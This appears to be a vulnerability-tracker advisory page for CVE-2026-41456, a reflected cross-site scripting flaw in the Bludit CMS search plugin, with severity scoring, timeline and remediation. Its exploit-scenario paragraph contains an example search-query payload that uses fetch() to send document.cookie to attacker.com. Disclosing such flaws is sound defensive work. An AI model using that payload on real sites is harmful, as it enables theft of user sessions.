Skip to main content

Bludit CMS CVE-2026-41456

| EUVD-2026-24239 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-21 VulnCheck GHSA-xmmc-cmm8-3rvm
XSS Bludit
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

7
PoC Detected
Apr 22, 2026 - 21:20 vuln.today
Public exploit code
Analysis Generated
Apr 21, 2026 - 19:46 vuln.today
CVSS changed
Apr 21, 2026 - 19:22 NVD
5.1 (MEDIUM)
EUVD ID Assigned
Apr 21, 2026 - 19:00 euvd
EUVD-2026-24239
Analysis Generated
Apr 21, 2026 - 19:00 vuln.today
Patch released
Apr 21, 2026 - 19:00 nvd
Patch available
CVE Published
Apr 21, 2026 - 18:03 nvd
MEDIUM 5.1

DescriptionCVE.org

Bludit CMS prior to commit 6732dde contains a reflected cross-site scripting vulnerability in the search plugin that allows unauthenticated attackers to inject arbitrary JavaScript by crafting a malicious search query. Attackers can execute malicious scripts in the browsers of users who visit crafted URLs containing the payload, potentially stealing session cookies or performing actions on behalf of affected users.

AnalysisAI

Reflected cross-site scripting in Bludit CMS search plugin allows unauthenticated attackers to inject arbitrary JavaScript through malicious search queries. When users visit attacker-crafted URLs containing the XSS payload, malicious scripts execute in their browsers, enabling session cookie theft and actions performed on behalf of victims. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker crafts XSS payload
Delivery
Embeds payload in search query parameter
Exploit
Social engineers victim to click malicious URL
Execution
Search plugin reflects unencoded payload
Persist
Browser executes JavaScript
Impact
Attacker steals session cookie or performs action
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the search plugin to be installed and enabled in the target Bludit instance (typical default configuration). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 5.1 with AV:N/AC:L/PR:N/UI:A reflects network-accessible, low-complexity exploitation requiring only user interaction (victim clicking a link). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a URL containing a search query with embedded JavaScript, e.g., https://target-bludit.com/search.php?query=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>, and sends it to a Bludit administrator via email or posts it on a forum where administrators may click. When the victim visits the link, the search plugin reflects the JavaScript into the page without escaping, causing it to execute in the victim's browser with their authenticated session. …
Remediation Upgrade Bludit CMS to a version incorporating commit 6732dde or later; exact released version number not specified in advisory, so administrators should pull the latest development branch or wait for the next stable release that includes this commit. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-41456 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy